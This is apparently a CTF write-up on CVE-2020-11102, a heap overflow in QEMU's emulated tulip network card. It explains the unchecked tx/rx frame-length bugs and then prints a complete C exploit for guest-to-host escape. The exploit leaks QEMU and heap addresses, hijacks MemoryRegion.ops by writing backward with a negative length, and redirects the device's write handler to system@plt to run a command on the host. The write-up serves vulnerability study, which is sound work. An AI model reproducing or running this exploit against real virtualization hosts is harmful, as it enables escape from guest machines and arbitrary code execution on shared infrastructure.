CVE-2020-11102: Escape from the Earth
Introduction
I recently played the Aliyun CTF and solved an interesting challenge based on CVE-2020-11102, a vulnerability in QEMU's emulated tulip network card that allows the guest OS to escape and execute arbitrary code on the host. In this article, I would like to share some details about the challenge and what I learned from it.
The vulnerability
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
    int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
    int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

    if (len1) {
        pci_dma_read(&s->dev, desc->buf_addr1,
            s->tx_frame + s->tx_frame_len, len1);
        s->tx_frame_len += len1;
    }

    if (len2) {
        pci_dma_read(&s->dev, desc->buf_addr2,
            s->tx_frame + s->tx_frame_len, len2);
        s->tx_frame_len += len2;
    }

    desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}
Take a look at tulip_copy_tx_buffers() first. It copies len1 bytes from the guest physical address desc->buf_addr1 to s->tx_frame + s->tx_frame_len, yet there is no check on s->tx_frame_len or on len1, and s->tx_frame_len is increased by len1 after each copy. By making the device process descriptors multiple times, we can grow s->tx_frame_len far past the size of the buffer, causing a buffer overflow.
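To make this concrete, here is a minimal standalone model of the unchecked accumulation (the 2048-byte buffer and the 0x400-byte chunks match the device and the exploit below; the rest is made up for illustration):

#include <stdio.h>
#include <stdint.h>

static uint8_t tx_frame[2048];   /* fixed-size buffer, as in TULIPState  */
static int tx_frame_len;         /* only ever grows, never validated     */

static void copy_tx(int len1) {
    /* tulip_copy_tx_buffers() pci_dma_read()s guest data to
     * tx_frame + tx_frame_len here, with no bounds check at all */
    if (tx_frame_len + len1 > (int)sizeof(tx_frame))
        printf("OOB: %#x bytes written past tx_frame\n",
               tx_frame_len + len1 - (int)sizeof(tx_frame));
    tx_frame_len += len1;
}

int main(void) {
    copy_tx(0x400);   /* tx_frame_len = 0x400 */
    copy_tx(0x400);   /* tx_frame_len = 0x800: buffer exactly full */
    copy_tx(0x400);   /* the third descriptor overflows the buffer */
    return 0;
}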
The same applies to tulip_copy_rx_bytes():
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
    int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
    int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
    int len;

    if (s->rx_frame_len && len1) {
        if (s->rx_frame_len > len1) {
            len = len1;
        } else {
            len = s->rx_frame_len;
        }
        pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
            (s->rx_frame_size - s->rx_frame_len), len);
        s->rx_frame_len -= len;
    }

    if (s->rx_frame_len && len2) {
        if (s->rx_frame_len > len2) {
            len = len2;
        } else {
            len = s->rx_frame_len;
        }
        pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
            (s->rx_frame_size - s->rx_frame_len), len);
        s->rx_frame_len -= len;
    }
}
tulip_copy_rx_bytes() copies data out of s->rx_frame to the guest buffer at desc->buf_addr1. There is no sanity check on s->rx_frame_len or s->rx_frame_size either, and since the source pointer is s->rx_frame + (s->rx_frame_size - s->rx_frame_len), controlling these two fields moves the read past the end of rx_frame. This results in a memory disclosure.
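Plugging in the values the exploit below plants via the TX overflow shows how far out of bounds the read starts (a standalone sketch of the arithmetic only):

#include <stdio.h>

int main(void) {
    /* values written into TULIPState by the exploit below */
    int rx_frame_size = 2048 * 2 + 0x900;   /* 0x1900 */
    int rx_frame_len  = 0x900;
    /* tulip_copy_rx_bytes() reads from
     * rx_frame + (rx_frame_size - rx_frame_len) */
    printf("source offset = %#x, but rx_frame is only 0x800 bytes\n",
           rx_frame_size - rx_frame_len);   /* 0x1000: 0x800 past the end */
    return 0;
}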
Exploitation
Leak something first
To leak the QEMU base address and a heap address, we need to control s->rx_frame_size and s->rx_frame_len. Consider the following structure:
typedef struct TULIPState {
    PCIDevice dev;
    MemoryRegion io;
    MemoryRegion memory;
    NICConf c;
    qemu_irq irq;
    NICState *nic;
    eeprom_t *eeprom;
    uint32_t csr[16];

    /* state for MII */
    uint32_t old_csr9;
    uint32_t mii_word;
    uint32_t mii_bitcnt;

    hwaddr current_rx_desc;
    hwaddr current_tx_desc;

    uint8_t rx_frame[2048];
    uint8_t tx_frame[2048];
    int tx_frame_len;
    int rx_frame_len;
    int rx_frame_size;

    uint32_t rx_status;
    uint8_t filter[16][6];
} TULIPState;
tx_frame is a fixed-size buffer of 2048 bytes. By triggering tulip_copy_tx_buffers() multiple times, we overflow it and take control of tx_frame_len, rx_frame_len and rx_frame_size. Then we trigger tulip_copy_rx_bytes() to copy out-of-bounds heap memory back into the guest's user space. With some calculation on the leaked pointers, we can recover the QEMU base address and heap address very easily.
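The reason the TX overflow reaches those fields is simply declaration order: the length fields sit directly behind tx_frame, which a quick offsetof check confirms (a standalone sketch with a trimmed copy of the struct's tail):

#include <stdio.h>
#include <stddef.h>
#include <stdint.h>

/* trimmed tail of TULIPState, just to show the field order */
struct tulip_tail {
    uint8_t rx_frame[2048];
    uint8_t tx_frame[2048];
    int tx_frame_len;
    int rx_frame_len;
    int rx_frame_size;
};

int main(void) {
    /* tx_frame_len is exactly sizeof(tx_frame) bytes past tx_frame, so
     * once two 0x400-byte copies fill the buffer, the next copy lands
     * right on top of it */
    printf("tx_frame_len is %zu bytes past tx_frame\n",
           offsetof(struct tulip_tail, tx_frame_len) -
           offsetof(struct tulip_tail, tx_frame));
    return 0;
}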
After leaking the memory, we need to figure out how to get arbitrary code execution within the context of QEMU. This piece of code caught my attention:
static const MemoryRegionOps tulip_ops = {
    .read = tulip_read,
    .write = tulip_write,
    .endianness = DEVICE_LITTLE_ENDIAN,
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};
What if we could control the function pointers in tulip_ops? Unfortunately, tulip_ops itself is a const global and is not writable. However, when the memory regions of TULIPState are initialized, a pointer to tulip_ops is stored in struct MemoryRegion.ops:
memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s,
                      "tulip-io", 128);
memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s,
                      "tulip-mem", 128);
struct MemoryRegion {
    Object parent_obj;

    /* All fields are private - violators will be prosecuted */

    /* The following fields should fit in a cache line */
    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly; /* For RAM regions */
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    bool global_locking;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;

    const MemoryRegionOps *ops;
    void *opaque;
    MemoryRegion *container;
    Int128 size;
    hwaddr addr;
    void (*destructor)(MemoryRegion *mr);
    uint64_t align;
    bool terminates;
    bool ram_device;
    bool enabled;
    bool warning_printed; /* For reservations */
    uint8_t vga_logging_count;
    MemoryRegion *alias;
    hwaddr alias_offset;
    int32_t priority;
    QTAILQ_HEAD(, MemoryRegion) subregions;
    QTAILQ_ENTRY(MemoryRegion) subregions_link;
    QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
    const char *name;
    unsigned ioeventfd_nb;
    MemoryRegionIoeventfd *ioeventfds;
};
And struct MemoryRegion is allocated on the heap (s->io and s->memory are embedded in the heap-allocated TULIPState), so we can overwrite MemoryRegion.ops with the address of tx_frame and craft a fake struct MemoryRegionOps there. Also notice that tx_frame_len, rx_frame_len and rx_frame_size are all of type int: by overwriting them with a negative value, we can write backward, in front of the buffer.
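Here is a tiny model of that backward write (the toy layout is invented; in the real exploit the negative deltas -0x3350-0x70 and -0x2a28-0x70 were derived from this binary's actual layout):

#include <stdio.h>
#include <string.h>

/* toy layout: an ops pointer sits below the overflowable buffer,
 * just like s->io.ops sits below tx_frame inside TULIPState */
struct toy_state {
    const void *ops;
    char pad[0x40];
    char tx_frame[0x40];
    int tx_frame_len;   /* attacker-controlled via the overflow */
};

int main(void) {
    struct toy_state s = { .ops = "original" };
    const void *fake = "hijacked";

    /* a negative length moves the destination below tx_frame... */
    s.tx_frame_len = -(int)(sizeof(s.pad) + sizeof(s.ops));
    /* ...so the next unchecked copy lands right on the ops pointer */
    memcpy(s.tx_frame + s.tx_frame_len, &fake, sizeof(fake));

    printf("ops is now: %s\n", (const char *)s.ops);
    return 0;
}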
The full exploit
The exploit below should be pretty straightforward, and the comments in the code should be self-explanatory.
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <unistd.h>
#include <sys/io.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

#define PMIO_BASE 0x000000000000c000

#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6

#if 0
call chain:
tulip_write ->
    tulip_xmit_list_update ->
        tulip_copy_tx_buffers ->
            pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1);

static uint32_t tulip_ts(TULIPState *s)
{
    return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}
#endif

struct tulip_descriptor {
    uint32_t status;
    uint32_t control;
    uint32_t buf_addr1;
    uint32_t buf_addr2;
};
int fd;

uint32_t page_offset(uint32_t addr) {
    return addr & ((1 << PAGE_SHIFT) - 1);
}

/* translate a guest virtual address to its page frame number
 * via /proc/self/pagemap (one 8-byte entry per virtual page) */
uint64_t gva_to_gfn(void *addr) {
    uint64_t pme, gfn;
    size_t offset;

    offset = ((uintptr_t)addr >> 9) & ~7;   /* (gva >> 12) * 8 */
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

/* guest virtual -> guest physical, used for the DMA descriptors */
uint64_t gva_to_gpa(void *addr) {
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != (uint64_t)-1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

uint64_t pmio_read(uint64_t port) {
    return inw(PMIO_BASE + port);
}

void pmio_write(uint64_t port, uint64_t val) {
    outw(val, PMIO_BASE + port);
}

void pmio_writel(uint64_t port, uint64_t val) {
    outl(val, PMIO_BASE + port);
}
int main(int argc, char **argv) {
    printf("[*] enter stage1\n");

    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }
    iopl(3);   /* allow port I/O from user space (needs root) */

    // allocate descriptors and buffers
    struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
    struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));
    char *recv_buf = malloc(0x9000);
    char *buf = malloc(0x1000);
    memset(buf, 'A', 0x1000);
    memset(recv_buf, 'B', 0x9000);

    int len1 = 0x400 << 0;   // TDES1_BUF1_SIZE
    int len2 = 0 << 11;      // TDES1_BUF2_SIZE
    tx_desc->status = (1UL << 31) | (1UL << 24);
    tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, resets tx_frame_len
    tx_desc->buf_addr1 = gva_to_gpa(buf);
    tx_desc->buf_addr2 = 0x180;
    printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

    // get the physical address of the descriptor
    uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
    printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

    // set CSR5_TS_SUSPENDED
    pmio_writel(CSR(6), 1u << 13); // CSR6_ST

    // set tx descriptor
    sleep(1);
    pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now
    printf("[*] fill tx_frame\n");

    // set tx descriptor again, this time without TDES1_FS
    sleep(1);
    tx_desc->status = (1UL << 31) | (1UL << 24);
    tx_desc->control = len2 | len1 | (1UL << 24);
    tx_desc->buf_addr1 = gva_to_gpa(buf);
    tx_desc->buf_addr2 = 0x180;
    pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x800 now

    // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
    printf("[*] clean CSR5\n");
    pmio_writel(CSR(5), 0xffffffff);

    struct oob_data { // the TULIPState fields that sit right behind tx_frame
        int tx_frame_len;
        int rx_frame_len;
        int rx_frame_size;
        uint32_t rx_status;
        uint8_t filter[16][6];
    };
    len1 = sizeof(struct oob_data);
    struct oob_data *oob_data = malloc(sizeof(struct oob_data));
    oob_data->tx_frame_len = 0x400 - len1;
    oob_data->rx_frame_len = 0x900;
    oob_data->rx_frame_size = 2048 * 2 + 0x900;
    for (int i = 0; i < 16; i++) { // make the MAC filter accept our frame
        memset(oob_data->filter[i], 'A', 6);
    }
    tx_desc->status = (1UL << 31) | (1UL << 24);
    tx_desc->buf_addr1 = gva_to_gpa(oob_data);
    tx_desc->buf_addr2 = 0x180;
    tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);
    pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // CSR6_OM_SHIFT, trigger tulip_receive
    sleep(1);
    printf("[*] OOB write tx_frame_len...\n");

    int rx_len1, rx_len2;
    rx_len1 = 0x400;
    rx_len2 = 0;
    rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
    rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
    rx_desc->buf_addr2 = 0x180;
    rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

    // set rx descriptor
    sleep(1);
    uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
    printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
    pmio_writel(CSR(3), rx_desc_gpa);

    // set tx descriptor: the looped-back frame goes through the corrupted
    // rx state and leaks heap memory into recv_buf
    sleep(1);
    pmio_writel(CSR(4), tx_desc_gpa);

    printf("[+] leak\n");
    char *cur = (char *)recv_buf;
    for (int i = 0; i < 50; ++i) {
        printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur + 8));
        cur += 16;
    }
    cur = (char *)recv_buf;
    // the slot indices and offsets below are specific to this build of QEMU
    uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
    uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
    uint64_t qemu_plt_system = qemu_base + 2859620; // system@plt
    uint64_t frame_base = heap_base + 0xe0fcf0;     // s->tx_frame, where the fake ops will live
    printf("[*] continue...\n");
    printf("[+] qemu_base: 0x%lx\n", qemu_base);
    printf("[+] heap_base: 0x%lx\n", heap_base);
printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
printf("[*] fill tx_frame\n");
// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);
// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // trigger tulip_tx
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}
    // now take control of MemoryRegion.ops
    printf("[*] enter stage3\n");
    {
        // craft a fake MemoryRegionOps in buf; the first TX copy stages it
        // in s->tx_frame (frame_base)
        ((uint64_t *)buf)[0] = qemu_plt_system;    // .read  -> system@plt
        ((uint64_t *)buf)[1] = qemu_plt_system;    // .write -> system@plt
        ((uint64_t *)buf)[2] = 0;
        ((uint64_t *)buf)[3] = 0;
        ((uint64_t *)buf)[4] = 2;                  // .endianness = DEVICE_LITTLE_ENDIAN
        ((uint64_t *)buf)[5] = 0;
        ((uint64_t *)buf)[6] = 0;
        ((uint64_t *)buf)[7] = 0;
        ((uint64_t *)buf)[8] = 0x0000000400000004; // .impl.min/max_access_size = 4
        ((uint64_t *)buf)[9] = 0;
        ((uint64_t *)buf)[10] = 0;
        ((uint64_t *)buf)[11] = 0;

        len1 = 0x400 << 0;
        len2 = 0 << 11;
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS
        tx_desc->buf_addr1 = gva_to_gpa(buf);
        tx_desc->buf_addr2 = 0x180;
        printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
        uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
        printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

        // CSR5_TS_SUSPENDED
        pmio_writel(CSR(6), 1u << 13); // CSR6_ST

        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);
        printf("[*] fill tx_frame\n");

        // set tx descriptor again
        sleep(1);
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->control = len2 | len1 | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(buf);
        tx_desc->buf_addr2 = 0x180;
        pmio_writel(CSR(4), tx_desc_gpa);

        // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
        printf("[*] clean CSR5\n");
        pmio_writel(CSR(5), 0xffffffff);

        len1 = sizeof(struct oob_data);
        struct oob_data *oob_data = malloc(sizeof(struct oob_data));
        oob_data->tx_frame_len = -0x2a28 - 0x70; // now points at MemoryRegion.ops
        oob_data->rx_frame_len = 0;
        oob_data->rx_frame_size = 0;
        for (int i = 0; i < 16; i++) { // make the MAC filter accept our frame
            memset(oob_data->filter[i], 0xff, 6);
        }
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(oob_data);
        tx_desc->buf_addr2 = 0x180;
        tx_desc->control = len2 | len1 | (1UL << 24);

        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);
        sleep(1);

        printf("[*] hijack ops\n");
        // overwrite MemoryRegion.ops with the address of the fake table
        uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
        fake_memory_region_ops[0] = frame_base;
        len1 = 8;
        len2 = 0;
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
        tx_desc->buf_addr2 = 0x180;
        tx_desc->control = len2 | len1 | (1UL << 24);
        pmio_writel(CSR(4), tx_desc_gpa);

        // trigger ops.write -> system("cat flag") on the host
        pmio_writel(CSR(4), tx_desc_gpa);
    }
    return 0;
}
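For reference, I compiled this statically inside the guest (something along the lines of gcc -O0 -static exploit.c -o exploit) and ran it as root, since both iopl(3) and /proc/self/pagemap require root. The final MMIO write dispatches through the hijacked ops->write, which is now system@plt, with the TULIPState pointer, whose first bytes were overwritten with "cat flag", as its first argument.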